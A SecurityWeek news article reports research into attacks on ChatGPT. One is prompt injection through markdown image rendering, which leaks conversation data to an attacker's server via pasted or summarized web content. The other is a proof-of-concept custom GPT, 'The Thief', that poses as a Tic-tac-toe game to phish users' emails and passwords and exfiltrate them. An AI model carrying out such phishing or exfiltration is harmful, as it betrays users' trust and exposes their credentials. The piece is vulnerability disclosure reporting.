Connect with us

Hi, what are you looking for?

SecurityWeekSecurityWeek

Artificial Intelligence

Malicious GPT Can Phish Credentials, Exfiltrate Them to External Server: Researcher

A researcher has shown how malicious actors can create custom GPTs that can phish for credentials and exfiltrate them to external servers. 

ChatGPT attack

A researcher has shown how malicious actors could create custom GPTs that can phish for user credentials and exfiltrate the stolen data to an external server. 

Researchers Johann Rehberger and Roman Samoilenko independently discovered in the spring of 2023 that ChatGPT was vulnerable to a prompt injection attack that involved the chatbot rendering markdown images. 

They demonstrated how an attacker could leverage image markdown rendering to steal potentially sensitive information from a user’s conversation with ChatGPT by getting the victim to paste apparently harmless but malicious content from the attacker’s website. The attack also works by asking ChatGPT to summarize the content from a website hosting specially crafted code. In both cases, the markdown image processed by the chatbot — which can be an invisible single-pixel image — is hosted on the attacker’s site.

ChatGPT creator OpenAI was informed about the attack method at the time, but said it was a feature that it did not plan on addressing. 

Rehberger said similar issues were found in chatbots such as Bing Chat, Google’s Bard and Anthropic Claud, whose developers released fixes. 

The researcher noticed this week that OpenAI has also started taking action to tackle the attack method. The mitigations have apparently only been applied to the web application — the attack still works on mobile apps — and they don’t completely prevent attacks. However, the researcher described it as a “step in the right direction”.

[ Watch Sessions From SecurityWeek’s 2023 Cyber AI & Automation Summit ]

On December 12, before OpenAI started rolling out mitigations, Rehberger published a blog post describing how the image markdown injection issue can be exploited in combination with custom versions of ChatGPT. 

Advertisement. Scroll to continue reading.

OpenAI announced in November that Plus and Enterprise users of ChatGPT would be allowed to create their own GPT, which they can customize for specific tasks or topics. 

Rehberger created a GPT named ‘The Thief’ that attempts to trick users into handing over their email address and password and then exfiltrates the data to an external server controlled by the attacker without the victim’s knowledge. 

This GPT claims to play a game of Tic-tac-toe against the user and requires an email address for a ‘personalized experience’ and the user’s password as part of a ‘security process’. The provided information is then sent to the attacker’s server. 

The researcher also showed how an attacker may be able to publish such a malicious GPT on the official GPTStore. OpenAI has implemented a system that prevents the publishing of GPTs that are obviously malicious. 

SecurityWeek has reached out to OpenAI for comment on the security research and will update this article if the company responds. 

Related: Major Organizations Using ‘Hugging Face’ AI Tools Put at Risk by Leaked API Tokens

Related: Simple Attack Allowed Extraction of ChatGPT Training Data

Related: Over a Dozen Exploitable Vulnerabilities Found in AI/ML Tools

Written By

Eduard Kovacs (@EduardKovacs) is a managing editor at SecurityWeek. He worked as a high school IT teacher for two years before starting a career in journalism as Softpedia’s security news reporter. Eduard holds a bachelor’s degree in industrial informatics and a master’s degree in computer techniques applied in electrical engineering.

Trending

Daily Briefing Newsletter

Subscribe to the SecurityWeek Email Briefing to stay informed on the latest threats, trends, and technology, along with insightful columns from industry experts.

Join the session as we discuss the challenges and best practices for cybersecurity leaders managing cloud identities.

Register

SecurityWeek’s Ransomware Resilience and Recovery Summit helps businesses to plan, prepare, and recover from a ransomware incident.

Register

People on the Move

Mike Dube has joined cloud security company Aqua Security as CRO.

Cody Barrow has been appointed as CEO of threat intelligence company EclecticIQ.

Shay Mowlem has been named CMO of runtime and application security company Contrast Security.

More People On The Move

Expert Insights

Related Content

Artificial Intelligence

The CRYSTALS-Kyber public-key encryption and key encapsulation mechanism recommended by NIST for post-quantum cryptography has been broken using AI combined with side channel attacks.

Artificial Intelligence

The release of OpenAI’s ChatGPT in late 2022 has demonstrated the potential of AI for both good and bad.

Artificial Intelligence

ChatGPT is increasingly integrated into cybersecurity products and services as the industry is testing its capabilities and limitations.

Artificial Intelligence

The degree of danger that may be introduced when adversaries start to use AI as an effective weapon of attack rather than a tool...

Artificial Intelligence

Two of humanity’s greatest drivers, greed and curiosity, will push AI development forward. Our only hope is that we can control it.

Artificial Intelligence

Microsoft and Mitre release Arsenal plugin to help cybersecurity professionals emulate attacks on machine learning (ML) systems.

Application Security

Thinking through the good, the bad, and the ugly now is a process that affords us “the negative focus to survive, but a positive...

Artificial Intelligence

Exposed data includes backup of employees workstations, secrets, private keys, passwords, and over 30,000 internal Microsoft Teams messages.